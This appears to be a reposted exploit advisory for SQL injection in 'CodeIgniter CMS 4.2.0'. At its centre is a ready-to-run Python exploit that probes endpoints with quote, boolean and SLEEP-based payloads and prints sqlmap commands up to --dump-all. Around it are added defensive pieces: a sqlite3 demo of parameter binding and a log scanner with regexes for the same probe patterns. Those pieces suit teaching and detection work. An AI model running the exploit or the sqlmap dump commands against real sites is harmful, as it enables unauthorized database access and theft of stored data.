CodeIgniter CMS 4.2.0 SQL Injection
CodeIgniter CMS 4.2.0 was susceptible to SQL Injection vulnerabilities. This typically arose when user-supplied input was directly concatenated into SQL queries without proper sanitization or parameterization.

Attackers could exploit this to execute arbitrary SQL commands, leading to unauthorized data access, modification, or even deletion. Common vectors included vulnerable GET/POST parameters or URL segments, allowing database enumeration or credential theft.

While CodeIgniter's framework provides robust query builder methods to prevent such issues, the vulnerability likely resided in custom application code within the CMS built upon the framework.

To mitigate, developers should always use prepared statements, parameterized queries, or CodeIgniter's Query Builder. Updating to a patched version of the CMS or ensuring all user input is validated and escaped is crucial for security.
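The difference between concatenation and parameter binding, shown by sending a stray quote and a true/false condition pair to both forms of the same query. This is an added example, not code from the advisory or from the CMS: it uses Python's `sqlite3` as a stand-in for the PHP data layer, and the `jobs` table and all function names are hypothetical.

```python
import sqlite3

# Constructed sample data; the `jobs` table and its columns are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO jobs (title) VALUES (?)",
                   [("engineer",), ("analyst",), ("editor",)])
    return db

def search_concat(db, title):
    """Vulnerable pattern: user input is spliced into the SQL text."""
    sql = "SELECT title FROM jobs WHERE title = '" + title + "'"
    return [row[0] for row in db.execute(sql)]

def search_bound(db, title):
    """Hardened pattern: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT title FROM jobs WHERE title = ?"
    return [row[0] for row in db.execute(sql, (title,))]

def probe(search, db):
    """Run a quote check and a boolean-pair check against one search function."""
    try:
        search(db, "engineer'")
        quote_error = False
    except sqlite3.Error:
        # An unbalanced quote broke the statement: input reached the parser.
        quote_error = True
    try:
        differs = (search(db, "engineer' AND '1'='1")
                   != search(db, "engineer' AND '1'='2"))
    except sqlite3.Error:
        differs = False
    return {"quote_error": quote_error, "boolean_differs": differs}

if __name__ == "__main__":
    print("concatenated:", probe(search_concat, make_db()))
    print("bound       :", probe(search_bound, make_db()))
```

With binding, the quote and the `AND` clause are compared as literal title text, so both checks come back negative while ordinary searches still work.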

=============================================================================================================================================
| # Title : CodeIgniter CMS 4.2.0 SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.codeigniter.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/167893/


[+] Summary :

Multiple SQL injection vulnerabilities exist in CodeIgniter CMS version 4.2.0.
The vulnerabilities affect various endpoints and parameters,
allowing unauthenticated attackers to execute arbitrary SQL queries and potentially compromise the entire database.
Multiple parameters across various endpoints fail to implement proper input sanitization, allowing SQL injection attacks through both GET and POST requests.


[+] POC : python poc.py

#!/usr/bin/env python3
"""
CodeIgniter CMS Version 4.2.0 SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in multiple parameters
"""

import requests
import sys
import urllib3
import time
from argparse import ArgumentParser

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class CodeIgniterExploit:
    def __init__(self, target):
        self.target = target.rstrip('/')
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive'
        })

    def check_vulnerability(self):
        """Check if target is vulnerable to SQL Injection"""
        print(f"[*] Checking vulnerability for: {self.target}")

        # Test multiple vulnerable endpoints
        endpoints = [
            "/Job/searchResult/?title=123",
            "/Job/searchResult/?title=test",
            "/search.php?search=1",
            "/news.php?p=7251",
            "/employe/show.php?cvid=14088",
            "/login/",
            "/fa/index.asp?p=search&search=1",
            "/fa/FormView/1026",
            "/fa/formview/1030"
        ]

        vulnerable_endpoints = []

        for endpoint in endpoints:
            # Test with single quote
            test_url = f"{self.target}{endpoint}'"

            try:
                response = self.session.get(test_url, timeout=10, verify=False)

                # Check for SQL error indicators
                error_indicators = [
                    "SQL syntax",
                    "mysql_fetch",
                    "mysql_num_rows",
                    "ODBC Driver",
                    "Unclosed quotation mark",
                    "syntax error",
                    "MySQL server",
                    "Warning: mysql",
                    "PostgreSQL",
                    "ORA-",
                    "Microsoft OLE DB"
                ]

                for error in error_indicators:
                    if error.lower() in response.text.lower():
                        print(f"[+] SQL Injection found in: {endpoint}")
                        vulnerable_endpoints.append(endpoint)
                        break

            except Exception as e:
                print(f"[-] Error testing {endpoint}: {e}")
                continue

        return vulnerable_endpoints

    def exploit_boolean(self, endpoint):
        """Boolean-based blind SQL injection"""
        print(f"[*] Testing boolean-based SQLi on: {endpoint}")

        # Test boolean conditions
        true_payload = f"{endpoint}' AND '1'='1"
        false_payload = f"{endpoint}' AND '1'='2"

        try:
            true_response = self.session.get(f"{self.target}{true_payload}", timeout=10, verify=False)
            false_response = self.session.get(f"{self.target}{false_payload}", timeout=10, verify=False)

            if true_response.text != false_response.text:
                print("[+] Boolean-based SQL Injection confirmed!")
                return True

        except Exception as e:
            print(f"[-] Boolean test failed: {e}")

        return False

    def exploit_time_based(self, endpoint):
        """Time-based blind SQL injection"""
        print(f"[*] Testing time-based SQLi on: {endpoint}")

        time_payload = f"{endpoint}' AND SLEEP(5)--"

        try:
            start_time = time.time()
            response = self.session.get(f"{self.target}{time_payload}", timeout=10, verify=False)
            end_time = time.time()

            if end_time - start_time >= 5:
                print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
                return True

        except Exception as e:
            print(f"[-] Time-based test failed: {e}")

        return False

    def generate_sqlmap_commands(self, endpoints):
        """Generate sqlmap commands for automated exploitation"""
        print("\n[+] SQLMap Commands:")
        print("=" * 60)

        for endpoint in endpoints:
            url = f"{self.target}{endpoint}"
            print(f"\n# For endpoint: {endpoint}")
            print(f'sqlmap -u "{url}" --batch --level=5 --risk=3')
            print(f'sqlmap -u "{url}" --batch --dbs')
            print(f'sqlmap -u "{url}" --batch --current-db')
            print(f'sqlmap -u "{url}" --batch --tables')
            print(f'sqlmap -u "{url}" --batch --dump-all')

    def comprehensive_scan(self):
        """Run comprehensive vulnerability scan"""
        print("[*] Starting comprehensive CodeIgniter CMS scan...")

        # Check vulnerability
        vulnerable_endpoints = self.check_vulnerability()

        if not vulnerable_endpoints:
            print("[-] No SQL Injection vulnerabilities found")
            return

        print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoints")

        # Test exploitation methods on each endpoint
        for endpoint in vulnerable_endpoints:
            print(f"\n[*] Testing exploitation methods for: {endpoint}")

            # Boolean-based
            self.exploit_boolean(endpoint)

            # Time-based
            self.exploit_time_based(endpoint)

        # Generate sqlmap commands
        self.generate_sqlmap_commands(vulnerable_endpoints)

def main():
    banner = """
    CodeIgniter CMS 4.2.0 SQL Injection Exploit
    By: indoushka
    """
    print(banner)

    parser = ArgumentParser(description='CodeIgniter CMS SQL Injection Exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
    parser.add_argument('--check', action='store_true', help='Check vulnerability only')
    parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
    parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')

    args = parser.parse_args()

    exploit = CodeIgniterExploit(args.url)

    if args.check:
        vulnerable_endpoints = exploit.check_vulnerability()
        if vulnerable_endpoints:
            print(f"\n[!] Target is VULNERABLE - Found {len(vulnerable_endpoints)} endpoints")
        else:
            print("\n[!] Target does not appear to be vulnerable")

    elif args.exploit:
        exploit.comprehensive_scan()

    elif args.sqlmap:
        vulnerable_endpoints = exploit.check_vulnerability()
        if vulnerable_endpoints:
            exploit.generate_sqlmap_commands(vulnerable_endpoints)
        else:
            print("[-] No vulnerable endpoints found for sqlmap")

    else:
        # Default: comprehensive scan
        exploit.comprehensive_scan()

if __name__ == "__main__":
    if len(sys.argv) == 1:
        print("Usage: python codeigniter_exploit.py -u https://target.com")
        print("Options: --check, --exploit, --sqlmap")
        sys.exit(1)

    main()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
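For defenders, the three request shapes this PoC sends (a trailing single quote, the `'1'='1` / `'1'='2` pair, and `SLEEP(`) can be hunted for in web-server access logs. The following is an added example, not part of the original advisory: the log lines are constructed, the combined log format is an assumption, and the rule names and `scan` function are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /Job/searchResult/?title=123%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /Job/searchResult/?title=123'%20AND%20'1'='1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2025:10:00:03 +0000] "GET /Job/searchResult/?title=123'%20AND%20'1'='2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2025:10:00:09 +0000] "GET /Job/searchResult/?title=123'%20AND%20SLEEP(5)-- HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.20 - - [01/Jan/2025:10:01:00 +0000] "GET /Job/searchResult/?title=O%27Brien+Ltd HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
203.0.113.20 - - [01/Jan/2025:10:01:05 +0000] "GET /news.php?p=7251 HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
"""

# One rule per probe shape; all are matched against the URL-decoded target.
RULES = {
    "trailing_quote": re.compile(r"'$"),
    "boolean_pair": re.compile(r"'\s*and\s*'\d'\s*=\s*'\d", re.I),
    "time_delay": re.compile(r"\bsleep\s*\(", re.I),
}

# client IP, request target and status code from a combined-format line
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def scan(log_text, min_rules=2):
    """Return {client_ip: [rule names]} for clients that hit >= min_rules rules.

    Requiring several distinct rules keeps a lone apostrophe in a legitimate
    search term (O'Brien) from raising an alert on its own.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        decoded = unquote_plus(target)  # undo %27, %20 and '+' before matching
        for name, rule in RULES.items():
            if rule.search(decoded):
                hits[ip].add(name)
    return {ip: sorted(names) for ip, names in hits.items() if len(names) >= min_rules}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, names)
```

The script sets a browser-like User-Agent, so matching has to be done on the request target rather than on client headers.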